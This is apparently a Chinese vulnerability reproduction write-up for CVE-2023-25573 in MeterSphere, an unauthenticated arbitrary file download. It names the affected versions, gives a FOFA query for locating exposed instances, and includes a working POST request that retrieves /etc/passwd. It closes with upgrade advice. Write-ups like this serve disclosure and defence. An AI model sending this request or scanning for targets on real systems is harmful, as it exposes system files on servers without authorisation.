文章目录
- MeterSphere 任意文件下载(CVE-2023-25573)漏洞复现[附POC]
- 0x01 前言
- 0x02 漏洞描述
- 0x03 影响版本
- 0x04 漏洞环境
- 0x05 漏洞复现
- 1.访问漏洞环境
- 2.构造POC
- 3.复现
- 0x06 修复建议
MeterSphere 任意文件下载(CVE-2023-25573)漏洞复现[附POC]
0x01 前言
免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!
0x02 漏洞描述
metersphere 是一个开源的持续测试平台。在受影响的版本中,“/api/jmeter/download/files”中存在不正确地访问控制漏洞,该漏洞允许任何用户无需身份验证即可下载任何文件。此问题可能会暴露运行进程可用的所有文件。
0x03 影响版本
MeterSphere <= 1.20.19 lts
MeterSphere <= 2.6.2
0x04 漏洞环境
FOFA语法: app=“FIT2CLOUD-MeterSphere”
0x05 漏洞复现
1.访问漏洞环境
2.构造POC
POC (POST)
POST /api/jmeter/download/files HTTP/1.1
Content-Type: application/json
Host: ip:port
Content-Length: 66
{"reportId":"369","bodyFiles":[{"id":"aaa","name":"/etc/passwd"}]}
3.复现
1.不需要登录直接发送数据包
2.数据包响应成功,文件名为:369.zip,可直接下载,解压后可查看 /etc/passwd 的内容。
0x06 修复建议
更新 MeterSphere 至安全版本:
https://github.com/metersphere/metersphere/releases
PS:参考链接
https://nvd.nist.gov/vuln/detail/CVE-2023-25573
https://github.com/metersphere/metersphere/security/advisories/GHSA-mcwr-j9vm-5g8h